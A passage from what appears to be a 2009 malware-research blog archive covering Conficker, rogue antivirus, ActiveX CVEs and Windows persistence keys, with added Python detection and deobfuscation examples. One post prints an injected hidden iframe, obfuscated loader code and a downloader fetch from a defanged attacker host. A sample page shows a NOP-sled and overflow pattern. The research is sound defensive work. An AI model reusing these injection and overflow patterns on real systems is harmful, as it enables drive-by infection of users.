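        pkts.append(Packet(i / 3.0, "10.0.0.9", "10.0.0.1", "udp", dport=53))
    return pkts


if __name__ == "__main__":
    for alert in udp_fanout_alerts(make_sample_traffic()):
        print(alert)
```

    Only the probing host is reported; the DNS host sends the same number of UDP packets but to a single destination and draws no errors. Thresholds need tuning per network: legitimate peer-to-peer clients (BitTorrent DHT, for instance) produce the same fan-out shape, so treat a hit as a lead for packet-level inspection rather than as a verdict.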

    “April Fooling Conficker.C”

    In the April 1st phase, we intercepted and manipulated the responses to the HTTP date-check queries, so that every website Conficker.C queried answered with a date stamp of April 1st, 2009. The local system time was also set to April 1st. By controlling the only two date sources, we fooled the malware into believing it was indeed April 1st! Soon after, we observed numerous DNS queries for the generated domain names.

    There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

    Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer-discovery packets, and found patterns in both the requests and the responses. These patterns hold for both the pre-April 1st and the April 1st UDP scans. Based on this, we have incorporated a new heuristic into our latest Network Security Platform signature set, 5.1.16.15 or 4.1.46.16.

    McAfee Network Security Platform (IntruShield) customers will see the following alerts:

    • WORM: W32/Conficker.C Activity Detected
    • HTTP: Suspicious Time Check Detected

    The figure below illustrates the alert viewer drilled down by a source IP that has generated the “WORM: W32/Conficker.C Activity Detected” alert.

     (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)

    Conficker Activation On April 1st

    Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

    The day has finally arrived.

    McAfee Avert Labs has been closely monitoring Conficker-related threats, and so far we have not observed any significant activity on the domains it is polling. Even so, please remain vigilant and watch this space for further updates on the current status.

    On measures to protect yourself and your organisation against Conficker, please visit:

    Message in a Malware

    We often see messages from malware authors in the malware that we analyze. And, strangely, unlike the theme of The Police’s hit song “Message in a Bottle,” these are never expressions of love. On the contrary, they’re usually offensive.

    Backdoor-DOQ is a backdoor Trojan. A variant that we analyzed last week would, among other things, establish a connection to a remote server via IRC and wait for commands from an attacker on that channel. Beyond its nastiness, the Backdoor-DOQ executable contains a message in plain text. I’ve censored the non-family-friendly pieces of this: “I do voodoo on your mom [expletive]. BTW metal rules pop sucks.”

     Backdoor-DOQ Voodoo

    It’s hardly a love song.

    The most common vulnerabilities used by malevolent URLs in China

    Every day, thousands of websites are injected with malicious code, and millions of hosts are infected by malware served from these malevolent URLs. The vulnerabilities in use lately are both Windows-based and in third-party applications. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

    1. BaoFeng2 Storm
    BaoFeng2 Storm is one of the most widely used media players in China. It supports multiple media formats, is easy to use, and is free. Multiple buffer overflows in BaoFeng2 Storm allow the download and execution of files. Its CVE number is CVE-2007-4816.
    Reference:
    http://www.baofeng.com/
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

    2. Baidu Soba
    Baidu Soba is a search toolbar that integrates MP3 search, web page search, Flash search and more. Vulnerabilities in BaiduBar.dll in Baidu Soba allow the download and execution of files via a specially crafted link. According to the vulnerability description, the flaw exists in versions prior to 5.4. Its CVE number is CVE-2007-4105.
    Reference:
    http://bar.baidu.com
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

    3. Xunlei Web
    Xunlei Web is download-manager software whose GUI control is very browser-like. Because users can find more and more valuable resources to download through Xunlei Web, it has a large user base. Buffer overflows in Xunlei Web before version 5.6.3.44 allow execution of arbitrary code. Its CVE number is CVE-2007-5064.
    Reference:
    http://dl.xunlei.com/index.htm
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

    4. PPStream
    PPStream is IPTV software based on peer-to-peer streaming. It is very popular in China. Buffer overflows in PowerPlayer.dll in PPStream before version 2.0.1.3829 allow execution of arbitrary code. Its CVE number is CVE-2007-4748.
    Reference:
    http://www.ppstream.com
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

    5. OurGame Chat
    OurGame is a free gaming platform covering most categories of network games, with nearly one hundred titles including card games, casual games and large-scale online games. A buffer overflow in the ConnectAndEnterRoom() method of GLChat.ocx, the OurGame Chat module, allows execution of arbitrary code. Its CVE number is CVE-2007-5722.
    Reference:
    http://www.ourgame.com
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

    6. Ultra Star Reader
    Ultra Star Reader is an e-book reader, similar to a PDF reader. Buffer overflows in Ultra Star Reader allow execution of arbitrary code. Its CVE number is CVE-2007-5807.
    Reference:
    http://www.ssreader.com
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

    7. JetAudio
    JetAudio is a media player with sound-enhancement features. Vulnerabilities in JetFlExt.dll in JetAudio version 7.0.3 allow overwriting of arbitrary local files, which attackers can use to drop malware on a system. Its CVE number is CVE-2007-4983.
    Reference:
    http://www.jetaudio.com
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

    8. Xunlei Thunder
    Xunlei Thunder is free download-manager software that supports multiple download protocols such as HTTP, FTP and BitTorrent. Buffer overflows in pplayer.dll in Xunlei Thunder allow execution of arbitrary code. Its CVE number is CVE-2007-6144.
    Reference:
    http://www.xunlei.com
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144
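    Every entry above follows the same drive-by shape: a malicious page instantiates a browser control (ActiveX object or `<object classid=...>` tag) and then hands one of its methods an oversized argument, usually padded with a string grown in a loop and carrying shellcode built with unescape(). The Python below is an added example of static page triage for that shape; it is not from the original post and does not know which control is vulnerable, it only reports controls that are instantiated and then fed suspicious arguments. The sample page is constructed: the ProgID Sample.Control.1 and the all-zero CLSID are placeholders, not identifiers of any of the products listed above. Packed or encoded scripts must be decoded before this kind of triage sees anything.

```python
import re

# var = new ActiveXObject("ProgID")
ACTIVEX_NEW_RE = re.compile(r"(\w+)\s*=\s*new\s+ActiveXObject\s*\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
ACTIVEX_ANY_RE = re.compile(r"new\s+ActiveXObject\s*\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
# <object classid="clsid:...">
OBJECT_TAG_RE = re.compile(r"<object\b[^>]*\bclassid\s*=\s*['\"]?clsid:([0-9a-f-]{36})", re.I)
# var = unescape("%u9090%u9090...")  (typical shellcode / heap-spray material)
UNESCAPE_VAR_RE = re.compile(r"(\w+)\s*=\s*unescape\s*\(\s*['\"]((?:%u[0-9a-f]{4}|%[0-9a-f]{2})+)['\"]", re.I)
# while (x.length < N) x += x;   (string doubling loop used to build padding)
GROWTH_LOOP_RE = re.compile(r"while\s*\(\s*(\w+)\.length\s*<\s*\d+\s*\)\s*\1\s*\+=\s*\1\b", re.I)
# obj.method(args)
METHOD_CALL_RE = re.compile(r"\b(\w+)\.(\w+)\s*\(\s*([^()]*)\)")
LONG_LITERAL_RE = re.compile(r"['\"]([^'\"]{256,})['\"]")


def triage_page(html: str):
    """Static triage for the instantiate-then-overflow pattern.

    Returns the controls seen, the variables that hold shellcode or grown
    padding, the method calls on those controls whose arguments use them
    (or a very long literal), and a verdict."""
    objects = dict(ACTIVEX_NEW_RE.findall(html))        # variable -> ProgID
    progids = ACTIVEX_ANY_RE.findall(html)
    clsids = [c.lower() for c in OBJECT_TAG_RE.findall(html)]
    shellcode_vars = [v for v, _ in UNESCAPE_VAR_RE.findall(html)]
    growth_vars = GROWTH_LOOP_RE.findall(html)
    tainted = set(shellcode_vars) | set(growth_vars)
    long_literals = len(LONG_LITERAL_RE.findall(html))

    tainted_calls = []
    for obj, method, args in METHOD_CALL_RE.findall(html):
        if obj not in objects:
            continue
        uses = tainted & set(re.findall(r"\w+", args))
        if uses or LONG_LITERAL_RE.search(args):
            tainted_calls.append({"object": obj, "progid": objects[obj],
                                  "method": method, "args": args.strip()})

    if tainted_calls:
        verdict = "suspicious"
    elif (progids or clsids) and (tainted or long_literals):
        verdict = "review"
    else:
        verdict = "clean"
    return {"progids": progids, "clsids": clsids, "shellcode_vars": shellcode_vars,
            "growth_vars": growth_vars, "long_literals": long_literals,
            "tainted_calls": tainted_calls, "verdict": verdict}


# Constructed page. "Sample.Control.1" and the all-zero CLSID are placeholders.
SAMPLE_PAGE = """<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="placeholder"></object>
<script>
var sc = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
var pad = "A";
while (pad.length < 4096) pad += pad;
var o = new ActiveXObject("Sample.Control.1");
o.LoadFile(pad + sc);
</script>
</body></html>"""


if __name__ == "__main__":
    for key, value in triage_page(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```

    The useful output is the tainted_calls list: it names the ProgID and the method that received the padded argument, which is exactly what an analyst needs to match against the vulnerable-method descriptions in the advisories above.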

    Another Day, Another Rogue Security Program

    There is really no scarcity of spurious security programs. Almost daily, we see programs that pretend to be security programs but in reality are malicious. They display messages about system compromise and attempt to frighten users into purchasing some other malicious program to prevent the compromise. Or worse. While displaying fake messages about system compromise is bad, it’s almost benign when you consider that a rogue antispyware could itself be spyware.

    Last week we stumbled upon FakeAlert-AntiSpywarePro. This is a rogue antispyware program. If you’re unlucky enough to run this application, you’ll see a window such as this:

    You can run several kinds of system scans with this program. But to what avail? You can’t trust a program that lies to you. FakeAlert-AntiSpywarePro drops a number of files and installs a bunch of registry keys, including a key for a browser-helper object (BHO) for Internet Explorer.

    So keep your AV signatures up to date, and say no to FUD seeded by unscrupulous malware authors!

    Another day hunting malware…

    Don’t you love it when legitimate obfuscated JavaScript is mixed with malicious JavaScript?
    And when the malicious script is chained through several redirections, referrer checks, exploits and other malware?

    So, here is the story…
    Once upon a time a user was searching Google for a service and found one that fit the need…
    The site is an innocent (until proven otherwise) website that has existed for some years to advertise a specific type of service.
    The site uses all that fancy (and legitimate) JavaScript to give the pages some special effects.

    Indeed, real special effects…because when you get in there, all the magic happens…:)

    From the user’s standpoint, he just went to the website, let’s call it specialeffectsservices.domain, and suddenly his machine is owned and the AV starts popping up alerts…

    A closer look reveals what happened:
    Among all the .js files on the website, one contains, besides the regular fancy JavaScript, something not so innocent…

    The script was obfuscated with the well-known (p,a,c,k,e,d) packer function.

    I managed to deobfuscate it and found the following iframe:
    [iframe width=1 height=1 src='hXXp://[REMOVED]-atm.net/b2b/' style='display:none'></iframe]

    If you go to the [REMOVED]-atm.net website, you will find the nice message:

    H@K3D 8Y J@KE-M1L

    If you go to [REMOVED]-atm.net/b2b you will be redirected to files[REMOVED].net.

    The files[REMOVED].net site also contains a folder called b2b with another obfuscated script (which is served only with the right referrer):

    [SCRIPT LANGUAGE="JavaScript"]
    function spl(){var
    crypted="60!83!99!114!105!112!116!32!76!97!110!103!117!97!103
    !101!61!39!74!97!118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!
    41!59!32
    .
    .
    .
    3!125!125!32!13!10!60!47!83!99!114!105!112!116!62!";var
    i,out="",temp="",c=0;l=crypted.length;do{while(crypted.charAt(c)!='!')temp=temp+crypted.charAt(c++);c++;
    out=out+String.fromCharCode(temp);temp="";}while(c<=crypted.length-1);document.write(out);}
    spl();
    [/SCRIPT]

    Once I deobfuscated it, I could see that it led to yet another redirect on the same site:

    q.open('GET','hXXp://files[REMOVED].net/b2b/load/',0);
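    The spl() routine above is a simple scheme: the payload is a run of decimal character codes separated by “!”, rebuilt with String.fromCharCode and written into the page with document.write. The Python below is an added example (not code from the post) that does the same transformation statically, so the stage-two script is recovered without ever letting it run, and then pulls out the next hops: injected iframes, whether they are hidden (1x1 or display:none, as the one above was), and XMLHttpRequest targets like the q.open() call. The sample script is constructed and encoded with the same “!” scheme; the hostname example.invalid is a placeholder, not the site from the post. The earlier (p,a,c,k,e,d) packer stage is not handled here.

```python
import re


def decode_bang_charcodes(crypted: str) -> str:
    """Static equivalent of spl(): decimal char codes separated by '!'.
    Nothing is executed; this only yields the text document.write would
    have injected into the page."""
    return "".join(chr(int(tok)) for tok in crypted.split("!") if tok)


def encode_bang_charcodes(text: str) -> str:
    """Inverse of the above; used here only to build the constructed sample."""
    return "".join(f"{ord(ch)}!" for ch in text)


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
HIDDEN_RE = re.compile(r"\b(?:width|height)\s*=\s*['\"]?[01]\b|display\s*:\s*none", re.I)
XHR_RE = re.compile(r"\.open\s*\(\s*['\"](?:GET|POST)['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)


def defang(url: str) -> str:
    """Make a URL unclickable in reports (http -> hXXp), as the post does."""
    return re.sub(r"^http(s?)://", r"hXXp\1://", url, flags=re.I)


def extract_iocs(script: str):
    """Next hops in decoded script text: injected iframes (and whether they
    are hidden) and XMLHttpRequest targets."""
    iocs = []
    for m in IFRAME_RE.finditer(script):
        attrs = m.group(1)
        src = SRC_RE.search(attrs)
        if src:
            iocs.append({"kind": "iframe", "url": defang(src.group(1)),
                         "hidden": bool(HIDDEN_RE.search(attrs))})
    for m in XHR_RE.finditer(script):
        iocs.append({"kind": "xhr", "url": defang(m.group(1)), "hidden": False})
    return iocs


def analyze_bang_script(crypted: str):
    decoded = decode_bang_charcodes(crypted)
    return {"decoded": decoded, "iocs": extract_iocs(decoded)}


# Constructed stage-two script; example.invalid is a placeholder hostname.
SAMPLE_PLAINTEXT = (
    "<Script Language='JavaScript'>\r\n"
    "document.write(\"<iframe width=1 height=1 src='http://example.invalid/b2b/' "
    "style='display:none'></iframe>\");\r\n"
    "var q=new XMLHttpRequest();q.open('GET','http://example.invalid/b2b/load/',0);\r\n"
    "</Script>"
)
SAMPLE_CRYPTED = encode_bang_charcodes(SAMPLE_PLAINTEXT)


if __name__ == "__main__":
    result = analyze_bang_script(SAMPLE_CRYPTED)
    print(result["decoded"])
    for ioc in result["iocs"]:
        print(ioc)
```

    Decoding the first few codes of the real crypted string (60!83!99!114!105!112!116!) gives “<Script”, which is how you confirm the scheme before decoding the whole thing. The point of doing it statically is that document.write in the original would have executed the second stage in the browser; here it is just text to read and to extract indicators from.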

    The /load path pushes a PE file to the user’s machine, usually to C:\ under the name T.exe.

    Of course it does not stop there…:)

    T.exe is a downloader, which then fetches two additional files from the same domain plus another from hansali[REMOVED].com.

    Additionally, files[REMOVED].net is the C&C server for the installed malware.

    And yes, we detect them all…:)

    More Comments Regarding Conficker

    A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

    First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

    The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

    But beyond anti-malware protection, what else can you do?

    The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

    Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

    === Update March 31, 2009, 7pm PDT ===

    It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

    W32/Conficker: Much Ado About Nothing?

    In the run-up to April 1, the media spotlight on the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms has turned out to be nothing but damp squibs.

    What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

    What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

    To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

    Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

    Sound Fake? Finding a Malicious Driver

    You already know that malware changes registry keys to take advantage of the autorun capability when systems and applications start. The registry keys we often see for this purpose include:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[Legit_program]\Debugger
    HKEY_CLASSES_ROOT\CLSID\[CLSID]\InprocServer32

    Recently, we noticed that the Lando Trojan uses a different registry key to load its malicious code into Internet Explorer. It drops a fake sound driver (wdmaud.sys) into the %system32% folder and adds the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2 = “%system32%\wdmaud.sys”. Entries under Drivers32 are loaded by the Windows multimedia subsystem into the processes that use it, so the malicious code ends up inside the iexplore.exe process. When the user launches Internet Explorer, the attacker hijacks Google search.

    How can you distinguish the real sound driver from the fake? The legitimate wdmaud.sys is Microsoft’s WINMM WDM Audio Compatibility driver. You’ll find it in the %system32%\drivers\ folder; it is about 84KB and carries complete version information.

    The malicious wdmaud.sys, by contrast, sits directly in the %system32% folder, is only about 22KB, and has no version information.

    By comparing their file properties, you can easily tell the difference. But, as always, be careful when deleting the malicious wdmaud.sys or other suspicious files. You don’t want to trash the legitimate driver.

    Should I Care About server.exe?

    Computer users know that they shouldn’t touch system files. If they did, they could damage their computers. A well-known ploy of malware authors is to name their files after system files. Users can be tricked into ignoring malicious files on their systems by this social-engineering method.

    Let’s look at what the Backdoor-CEP.gen Trojan does, for example. When a user is infected with this Trojan, it drops the file server.exe into the user’s system directory:

     server.exe

    Like many system files, server.exe is hidden. Now how many users would take a second look at server.exe in their system32 folders? Unfortunately, server.exe is a backdoor that waits for and responds to commands from remote attackers. As always, users should exercise caution when dealing with executables of unknown origin. For more about the Backdoor-CEP.gen family, check out its VIL page.

    Breaking the Codec…

    I ran across a new twist on the by-now well known FakeAlert series. Just in case you have been lucky enough not to have dealt with this malware, it goes roughly like this:

    You get an email from what looks to be a legitimate source, or visit a legitimate looking website that is offering the latest must-have application or upgrade. “This thing looks cool”, you think as you happily ignore your IT security friend’s advice against following unsolicited or potentially unsafe links. “Someone must really like me to be sharing this with me”.

    So you continue to download the ‘treasure’. Then when you try to install it, it pops up an error – something about being corrupt and the installation cannot proceed. Seconds later, you find that some ‘nice’ company has put an antivirus scanner on your computer and begins to scan it for you. You find out that you are loaded with all kinds of nasty stuff and because nothing in life is free, you have to pony up the money to have your computer cleaned.

    Problem is, you may not have had these infections in real life. Except, of course, the one you downloaded and installed yourself. This is but one scenario of the fake antivirus scourge.

    So the new twist is that your favorite audio or video application may now assist in this nefarious sale. When you install this application, you will actually see things ‘happening’. You won’t be happily working away listening to the latest pop sensation when this gets loaded. The malware will actually stop your multimedia application and drop your volume to zero. It will likewise prevent you from attempting to restart it. You will start to get more and more ominous warnings about your audio and video codecs being corrupted until your entire desktop background is replaced with a giant ‘Your system is melting down and the world is coming to an end – just click here and we will help you fix it’ message (author’s note: it’s not that dramatic, but you get the idea). Of course to ‘fix’ it, it will cost you.

    That said, be careful of this scam. We all would like to whistle while we work, but this may have you singing a different tune (sorry, couldn’t resist the sappy line).

    More technical information is available here:
    FakeAlert-MCodec

    McAfee Debuts ‘Combating Threats’ Series

    McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

    UPDATE MARCH 17th

    Apologies for the busted links yesterday. All seem to be resolving fine now.

    Democrats.org Cans the Spam

    Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

    In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

    Safe Mode: A Misnomer

    Windows offers the useful option of “Safe Mode” to recover from any damage caused by various malfunctions in the system. Booting in Safe Mode loads limited drivers and services that are required for the basic operation of the system, but avoids adding many extras that complicate the environment. In general, Safe Mode is very helpful in recovering the system from malware infections. However, malware can exploit this feature by loading in Safe Mode, thus creating great difficulties for users and administrators in recovering from these infections.

    Safe Mode not safe

    The services and drivers that load in Safe Mode are listed under the following registry key(s):

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

    If malware gains control of the system, it can add its entry under the above key(s) to load during a Safe Mode boot. This type of malware is difficult to remove manually; you’ll need an anti-virus product to detect and clean such malware.
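    Both this post and the “Sound Fake? Finding a Malicious Driver” post above come down to the same triage step: export the relevant registry keys and look for entries that do not belong. The Python below is an added example (not from either post) that parses a `reg export` / regedit .reg file and applies two checks: under Drivers32, flag values that name a kernel-style .sys file or carry an explicit path, since that key is meant for user-mode .drv/.dll multimedia drivers and the real wdmaud.sys lives in System32\drivers; under SafeBoot\Minimal and \Network, flag subkeys absent from a baseline. The .reg text is constructed, modelled on the Lando entry described above; ConstructedBadSvc is a placeholder name. The SafeBoot baseline shown is a partial, illustrative allowlist: in practice, export the SafeBoot key from a known-clean machine of the same OS build and use that.

```python
import re

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')

DRIVERS32_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32"
SAFEBOOT_ROOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"


def parse_reg_export(text: str):
    """Minimal parser for 'reg export' / regedit .reg files.
    Returns {key_path: {value_name: data}}; '@' is the default value.
    Only string (REG_SZ) data is decoded; other types are kept as None."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";")
                or line.startswith("Windows Registry Editor") or line == "REGEDIT4"):
            continue
        km = KEY_RE.match(line)
        if km:
            current = km.group(1)
            keys.setdefault(current, {})
            continue
        vm = VALUE_RE.match(line)
        if vm and current is not None:
            name = "@" if vm.group(1) is None else vm.group(1)
            data = vm.group(2)
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')  # .reg escapes
            else:
                data = None
            keys[current][name] = data
    return keys


def check_drivers32(keys):
    """Drivers32 holds user-mode multimedia drivers (.drv/.dll) loaded by winmm.
    A kernel-style .sys name here, or an explicit path, is out of place."""
    findings = []
    for name, data in keys.get(DRIVERS32_KEY, {}).items():
        if data is None:
            continue
        low = data.lower()
        if low.endswith(".sys"):
            findings.append((name, data, "kernel driver name in a user-mode driver slot"))
        elif "\\" in low:
            findings.append((name, data, "explicit path; expected a bare .drv/.dll filename"))
    return findings


def check_safeboot(keys, baseline):
    """Report SafeBoot\\Minimal and \\Network entries missing from the baseline."""
    pattern = re.compile(re.escape(SAFEBOOT_ROOT) + r"\\(Minimal|Network)\\([^\\]+)$", re.I)
    findings = []
    for path, values in keys.items():
        m = pattern.match(path)
        if not m:
            continue
        lst, entry = m.group(1).capitalize(), m.group(2)
        allowed = {e.lower() for e in baseline.get(lst, ())}
        if entry.lower() not in allowed:
            findings.append((lst, entry, values.get("@")))
    return findings


# Partial baseline, for illustration only (assumption: a handful of XP-era
# entries). Build the real one from a clean reference machine.
BASELINE_SAFEBOOT = {
    "Minimal": {"Base", "Boot Bus Extender", "EventLog", "PlugPlay", "RpcSs", "vga.sys", "WinMgmt"},
    "Network": {"Base", "Boot Bus Extender", "EventLog", "PlugPlay", "RpcSs", "vga.sys", "WinMgmt", "Tcpip"},
}

# Constructed export. "aux2" mirrors the Lando entry; ConstructedBadSvc is a placeholder.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"midimapper"="midimap.dll"
"wavemapper"="msacm32.drv"
"aux"="wdmaud.drv"
"aux2"="C:\\WINDOWS\\system32\\wdmaud.sys"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ConstructedBadSvc]
@="Service"
"""


if __name__ == "__main__":
    parsed = parse_reg_export(SAMPLE_REG_EXPORT)
    for finding in check_drivers32(parsed) + check_safeboot(parsed, BASELINE_SAFEBOOT):
        print(finding)
```

    A hit on either check is a pointer, not a verdict: follow it up by looking at the named file itself (location, size and version resource, as the Lando post describes for wdmaud.sys) before deleting anything, since removing the wrong driver or Safe Mode entry can leave the machine unable to boot into Safe Mode at all.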

    Always practice “safe surfing,” which is the first step in keeping your computers clean, and keep your anti-virus signatures updated.

    Avert Passes Milestone: 20 Million Malware Samples

    One month ago, my colleague Marius Van Oers posted a blog to announce that the number of drivers in our DATs had passed 500,000. Today, McAfee reached another record: we received our twenty-millionth malware sample.

    In about 22 years, from 1986 to March 2008, 10 million samples piled up in our collection. In just the last 12 months, however, from March 2008 to March 2009, this figure doubled. This pace represents 27,000 samples in a day, or 1,100 each hour.

    These figures demonstrate that real-time response is more vital than ever. But it is not sufficient. Faced with such quantity, researchers have to innovate to create sophisticated heuristic detections. And a third need is a multidisciplinary response: Research teams devoted to host intrusions, network intrusions, and ethical vulnerability disclosure also have to play an important part in this battle. As a global research team, McAfee Avert Labs is able to take up the challenge. I’ll just wish “good luck” to all my colleagues. :-)

    Renamed Notepad.exe Plagues Removable Drives

    During the last couple of years we have seen malware authors increasingly incorporate the autorun.inf infection vector into malware families–with stunning success. In addition to traditional autorun worms that use this feature, pure-play backdoors, bots, password stealers, and even parasitic viruses that previously required a user to click on an executable file to infect the system have incorporated this technique. While the autorun functionality in operating systems does provide some convenience (it saves a couple of clicks), it has single-handedly revived the 1980s model of hand-carried malware propagation.

    Two prolific parasitic virus families that have incorporated this infection vector are W32/Sality and W32/Virut. When a removable drive is inserted into an infected machine, the W32/Sality virus infects Microsoft Notepad or Minesweeper and copies it onto the removable drive. The infected notepad.exe or winmine.exe is renamed to a random name with a .pif or .scr extension and accompanied by an obfuscated autorun.inf. Below you’ll see a code snippet and the accompanying autorun.inf file.

    Code Snippet of W32/Sality

    Accompanying Autorun.inf file

    Even if the removable drive is cleaned of the virus infection, the randomly named Microsoft executable would still exist on the drive. Although benign, the leftover remnant causes some confusion about the origin of the file, especially since it’s a renamed Microsoft file with a .pif or .scr extension!

    The W32/Virut virus is also known to copy infected notepad.exe files to removable drives. Both these virus families are a royal pain in the posterior to clean. This technique provides a resourceful way for them to reinfect hosts even after cleanup.
